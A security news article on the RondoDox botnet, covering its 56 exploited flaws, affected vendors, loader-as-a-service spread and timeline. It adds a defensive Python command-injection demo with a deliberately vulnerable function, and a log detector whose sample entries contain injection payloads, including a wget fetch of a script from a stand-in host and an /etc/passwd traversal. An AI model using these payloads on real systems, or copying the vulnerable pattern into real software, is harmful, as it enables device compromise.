RondoDox Botnet Exploits 56 Vulnerabilities Across Multiple Vendors
TL;DR
The RondoDox botnet has expanded its attack surface to 56 vulnerabilities across more than 30 vendors, using what Trend Micro calls an "exploit shotgun" approach. It targets a wide array of internet-exposed devices, including routers, DVRs, NVRs, CCTV systems, and web servers, and is also being distributed through a loader-as-a-service model that bundles it with Mirai and Morte payloads.
RondoDox Botnet Overview
The RondoDox botnet is actively exploiting 56 vulnerabilities across more than 30 vendors, targeting internet-exposed infrastructure such as routers, digital video recorders (DVRs), network video recorders (NVRs), CCTV systems, web servers, and other network devices. Trend Micro describes the activity as an "exploit shotgun" approach: rather than tailoring an attack to one product, the botnet fires its whole exploit set at any reachable host and keeps whatever lands. The botnet was first documented by Fortinet FortiGuard Labs in July 2025.
Initial Intrusion and Expansion
Trend Micro detected an intrusion attempt on June 15, 2025, in which the attackers exploited CVE-2023-1389, a command injection flaw in TP-Link Archer routers that was first demonstrated at Pwn2Own Toronto in December 2022 and has been exploited in the wild since 2023. More recently, RondoDox has broadened its distribution through a "loader-as-a-service" infrastructure that co-packages it with Mirai and Morte payloads.
Exploit Arsenal
RondoDox's arsenal covers 56 security flaws, 38 with CVE identifiers and 18 without. The affected vendors include D-Link, TVT, LILIN, Fiberhome, Linksys, BYTEVALUE, ASMAX, Brickcom, IQrouter, Ricon, Nexxt, NETGEAR, Apache, TBK, TOTOLINK, Meteobridge, Digiever, Edimax, QNAP, GNU, Dasan, Tenda, LB-LINK, AVTECH, Zyxel, Hytec Inter, Belkin, Billion, and Cisco.
Loader-as-a-Service
On September 25, 2025, CloudSEK published details of a large-scale loader-as-a-service botnet distributing RondoDox, Mirai, and Morte payloads through SOHO routers, Internet of Things (IoT) devices, and enterprise applications. Initial access is gained by weaponizing weak credentials, unsanitized inputs, and old CVEs.
AISURU Botnet Connection
Security journalist Brian Krebs noted that the AISURU botnet draws most of its firepower from compromised IoT devices hosted on U.S. internet providers such as AT&T, Comcast, and Verizon. One of the botnet's operators, known as Forky, is allegedly based in São Paulo, Brazil, and is linked to a DDoS mitigation service called Botshield.
RDP Attack Wave
A coordinated botnet operation involving over 100,000 unique IP addresses from at least 100 countries is targeting Remote Desktop Protocol (RDP) services in the U.S., according to GreyNoise.
Vulnerability Exploitation Details
The vulnerabilities RondoDox exploits include command injection, path traversal, buffer overflows and other memory corruption, and authentication bypasses. Researchers have also observed the campaign targeting flaws first demonstrated at Pwn2Own contests. The initial RondoDox intrusion observed by Trend Micro on June 15, 2025, exploited CVE-2023-1389, an unauthenticated command injection flaw reachable through the WAN interface of the TP-Link Archer AX21 Wi-Fi router, which means the device can be compromised directly from the internet without any credentials.
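The command injection class that dominates this campaign follows one pattern: a request parameter is pasted into a shell command. The following is an added example written for this page, not code from TP-Link, Trend Micro, or any affected vendor, and it does not reproduce the real CVE-2023-1389 code path. The "country" parameter, the allowlist, and the `HELPER_SRC` one-liner standing in for the firmware's configuration helper are all assumptions made so the example runs anywhere with Python and /bin/sh. It shows the vulnerable form, a partial mitigation with `shlex.quote`, and the hardened form that validates input and avoids the shell entirely.

```python
import re
import shlex
import subprocess
import sys

# Allowlist for the hypothetical "country" setting: exactly two upper-case letters.
COUNTRY_RE = re.compile(r"[A-Z]{2}")

# Stand-in for the firmware helper that would apply the setting. It is a
# constructed Python one-liner so the example runs anywhere; a real device
# would invoke its own binary here.
HELPER_SRC = "import sys; print('country=' + sys.argv[1])"


def set_country_vulnerable(country: str) -> str:
    """CWE-78 pattern: the request parameter is pasted into a shell command
    string, so metacharacters such as ; | ` $( ) are interpreted by /bin/sh."""
    cmd = f'{sys.executable} -c "{HELPER_SRC}" {country}'
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


def set_country_quoted(country: str) -> str:
    """Mitigation when a shell is unavoidable: shlex.quote() turns the whole
    value into one literal argument, so 'US; echo X' is passed verbatim
    instead of being executed. The bogus value is still accepted, though."""
    cmd = f'{sys.executable} -c "{HELPER_SRC}" {shlex.quote(country)}'
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


def set_country_hardened(country: str) -> str:
    """Preferred fix: validate against an allowlist and invoke the helper with
    an argv list (no shell), so the value is never interpreted at all."""
    if not COUNTRY_RE.fullmatch(country):
        raise ValueError(f"rejected country value: {country!r}")
    result = subprocess.run(
        [sys.executable, "-c", HELPER_SRC, country],
        capture_output=True, text=True, check=True,
    )
    return result.stdout


def hardened_rejects(country: str) -> bool:
    """True if the hardened handler refuses the value."""
    try:
        set_country_hardened(country)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = "US; echo INJECTED"  # constructed attacker-controlled value
    print(repr(set_country_vulnerable(payload)))  # 'country=US\nINJECTED\n'
    print(repr(set_country_quoted(payload)))      # 'country=US; echo INJECTED\n'
    print(hardened_rejects(payload))              # True
    print(repr(set_country_hardened("US")))       # 'country=US\n'
```

The quoting-only variant is worth keeping in mind when auditing firmware: it stops the injection but still lets garbage reach the helper, and it breaks the moment someone later builds the command with a different shell or a different quoting convention. Allowlisting plus an argv list has no such failure mode.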
Key Events Timeline
Key events in the RondoDox vulnerability timeline include:
- December 6, 2022: Exploitation of TP-Link AX1800 WAN interface at Pwn2Own Toronto 2022.
- January 10, 2023: Trend Micro publishes rule 42150 for the command injection vulnerability.
- January 15, 2023: CVE-2023-1389 is reported to TP-Link, with coordinated public disclosure.
- June 15, 2025: First RondoDox event detected exploiting CVE-2023-1389.
- September 22, 2025: Trend Threat Research triages a RondoDox exploitation spike.
- September 25, 2025: CloudSEK reports rapid growth via a loader-as-a-service model.
Vendor Vulnerability List
The botnet targets a variety of vendors and products, exploiting command injection vulnerabilities (CWE-78) in most cases. Some examples include:
- D-Link: DNS-343 ShareCenter / goAhead Web Server
- TVT: NVMS-9000 Digital Video Recorder (DVR)
- LILIN: DVR (Variant A & B)
- Fiberhome: Router SR1041F RP0105
- Linksys: Router apply.cgi (Variant A & B)
The complete list includes 56 vulnerabilities, with 38 CVEs assigned and 18 without CVEs.
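Because the botnet sprays exploits for dozens of products at every host it reaches, a single source will typically hit many vendor-specific CGI endpoints in quick succession, most of which do not exist on the target. That pattern is visible in ordinary web-server access logs. The following detector is an added example for this page, not code from Trend Micro or any vendor; the log lines are constructed, and the request paths, addresses, and the `spray_threshold` of three distinct endpoints are illustrative assumptions rather than observed RondoDox indicators. It flags CWE-78 shell metacharacters and CWE-22 traversal sequences in URL-decoded request targets and then reports sources whose suspicious requests touched several different endpoints.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed web-server access log (common log format). The request paths and
# addresses are illustrative stand-ins, not the botnet's real request patterns.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Jun/2025:10:01:02 +0000] "POST /cgi-bin/setup.cgi?name=US%3Bwget%20http%3A%2F%2F198.51.100.9%2Fx.sh HTTP/1.1" 200 12
203.0.113.7 - - [15/Jun/2025:10:01:03 +0000] "GET /apply.cgi?op=%60id%60 HTTP/1.1" 404 0
203.0.113.7 - - [15/Jun/2025:10:01:04 +0000] "GET /goform/cfg?file=../../../../etc/passwd HTTP/1.1" 404 0
203.0.113.7 - - [15/Jun/2025:10:01:05 +0000] "POST /dvr/login?user=admin%24%28uname%29 HTTP/1.1" 404 0
198.51.100.22 - - [15/Jun/2025:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 512
198.51.100.22 - - [15/Jun/2025:10:02:01 +0000] "GET /cgi-bin/setup.cgi?name=US HTTP/1.1" 200 12
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Shell metacharacters that have no place in a configuration parameter.
CMD_INJ_RE = re.compile(r"[;|`]|\$\(|\$\{|&&")
# Directory traversal sequences.
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")


def classify_target(target: str):
    """Decode the request target (twice, to defeat double encoding) and
    return it with the list of weakness classes its content suggests."""
    decoded = unquote_plus(unquote_plus(target))
    findings = []
    if CMD_INJ_RE.search(decoded):
        findings.append("CWE-78 command injection")
    if TRAVERSAL_RE.search(decoded):
        findings.append("CWE-22 path traversal")
    return decoded, findings


def analyze(log_text: str, spray_threshold: int = 3):
    """Return per-request hits and the set of sources whose suspicious
    requests touched at least spray_threshold distinct endpoints, which is
    the 'shotgun' signature of one host trying many vendors' exploits."""
    hits = []
    endpoints_by_ip = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded, findings = classify_target(m["target"])
        if not findings:
            continue
        endpoint = decoded.split("?", 1)[0]
        endpoints_by_ip[m["ip"]].add(endpoint)
        hits.append({"ip": m["ip"], "ts": m["ts"], "endpoint": endpoint,
                     "status": int(m["status"]), "findings": findings})
    spraying = {ip for ip, eps in endpoints_by_ip.items()
                if len(eps) >= spray_threshold}
    return hits, spraying


if __name__ == "__main__":
    hits, spraying = analyze(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["endpoint"], h["status"], ", ".join(h["findings"]))
    print("spraying sources:", sorted(spraying))
```

Note that three of the four flagged requests returned 404: a shotgun campaign hits endpoints the target does not have, so a missing page is not evidence that nothing was attempted. Counting distinct suspicious endpoints per source, rather than alerting on each request, is what separates the spray from an isolated probe, and the single legitimate `name=US` request from the second address produces no finding.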
Proactive Security Measures
Defenders should adopt a proactive security posture: run regular vulnerability assessments against internet-facing devices, segment IoT and network appliances from the rest of the network, keep device management interfaces off the WAN side (the entry point in the TP-Link case), and monitor continuously for signs of compromise.